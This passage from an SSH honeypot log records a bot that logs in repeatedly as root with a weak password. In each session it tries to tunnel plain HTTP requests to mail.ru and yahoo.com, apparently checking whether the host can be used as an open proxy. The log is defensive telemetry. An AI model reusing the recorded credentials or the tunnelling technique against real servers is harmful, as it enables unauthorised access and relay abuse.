1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.129315Z","src_ip":"77.83.207.83","session":"351164b82340"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.380175Z","src_ip":"77.83.207.83","session":"351164b82340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6798,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6798","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.431771Z","session":"351164b82340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.482133Z","src_ip":"77.83.207.83","session":"351164b82340"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":26465,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:26465","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.624745Z","session":"351164b82340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.675000Z","src_ip":"77.83.207.83","session":"351164b82340"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.721954Z","src_ip":"212.227.125.160","session":"b0399dc3c9a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":29161,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29161","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.816894Z","session":"351164b82340"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.867181Z","src_ip":"77.83.207.83","session":"351164b82340"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.918128Z","src_ip":"77.83.207.83","session":"351164b82340"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39013,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa2cad4eccf0","protocol":"ssh","message":"New connection: 77.83.207.83:39013 (1.2.3.4:22) [session: fa2cad4eccf0]","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.967384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.968223Z","src_ip":"77.83.207.83","session":"fa2cad4eccf0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.018888Z","src_ip":"77.83.207.83","session":"fa2cad4eccf0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.269702Z","src_ip":"77.83.207.83","session":"fa2cad4eccf0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":19717,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:19717","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.320915Z","session":"fa2cad4eccf0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.371367Z","src_ip":"77.83.207.83","session":"fa2cad4eccf0"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.419719Z","src_ip":"212.227.235.229","session":"8b427e3bde12"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":12423,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12423","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.512697Z","session":"fa2cad4eccf0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.563003Z","src_ip":"77.83.207.83","session":"fa2cad4eccf0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":12395,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12395","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.704834Z","session":"fa2cad4eccf0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.755237Z","src_ip":"77.83.207.83","session":"fa2cad4eccf0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.806150Z","src_ip":"77.83.207.83","session":"fa2cad4eccf0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39102,"dst_ip":"1.2.3.4","dst_port":22,"session":"d856771afdde","protocol":"ssh","message":"New connection: 77.83.207.83:39102 (1.2.3.4:22) [session: d856771afdde]","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.856354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.857371Z","src_ip":"77.83.207.83","session":"d856771afdde"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:16.907600Z","src_ip":"77.83.207.83","session":"d856771afdde"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.158046Z","src_ip":"77.83.207.83","session":"d856771afdde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10941,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10941","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.209941Z","session":"d856771afdde"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.260198Z","src_ip":"77.83.207.83","session":"d856771afdde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2489,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2489","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.400715Z","session":"d856771afdde"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.451075Z","src_ip":"77.83.207.83","session":"d856771afdde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":9195,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9195","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.592534Z","session":"d856771afdde"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.642797Z","src_ip":"77.83.207.83","session":"d856771afdde"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.693765Z","src_ip":"77.83.207.83","session":"d856771afdde"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39194,"dst_ip":"1.2.3.4","dst_port":22,"session":"a62586d54e3b","protocol":"ssh","message":"New connection: 77.83.207.83:39194 (1.2.3.4:22) [session: a62586d54e3b]","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.745103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.755417Z","src_ip":"77.83.207.83","session":"a62586d54e3b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:17.798102Z","src_ip":"77.83.207.83","session":"a62586d54e3b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.059855Z","src_ip":"77.83.207.83","session":"a62586d54e3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4699,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4699","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.113172Z","session":"a62586d54e3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.165768Z","src_ip":"77.83.207.83","session":"a62586d54e3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":21768,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21768","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.310943Z","session":"a62586d54e3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.363568Z","src_ip":"77.83.207.83","session":"a62586d54e3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":8253,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8253","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.510918Z","session":"a62586d54e3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.563388Z","src_ip":"77.83.207.83","session":"a62586d54e3b"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.616787Z","src_ip":"77.83.207.83","session":"a62586d54e3b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39277,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ffce2a7f6a9","protocol":"ssh","message":"New connection: 77.83.207.83:39277 (1.2.3.4:22) [session: 1ffce2a7f6a9]","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.665128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.665900Z","src_ip":"77.83.207.83","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.715764Z","src_ip":"77.83.207.83","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:18.963570Z","src_ip":"77.83.207.83","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16769,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16769","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.014229Z","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.065010Z","src_ip":"77.83.207.83","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":16701,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16701","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.208093Z","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.257954Z","src_ip":"77.83.207.83","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":20036,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20036","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.400085Z","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.450145Z","src_ip":"77.83.207.83","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.501375Z","src_ip":"77.83.207.83","session":"1ffce2a7f6a9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39366,"dst_ip":"1.2.3.4","dst_port":22,"session":"051b405eac61","protocol":"ssh","message":"New connection: 77.83.207.83:39366 (1.2.3.4:22) [session: 051b405eac61]","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.551894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.552539Z","src_ip":"77.83.207.83","session":"051b405eac61"}
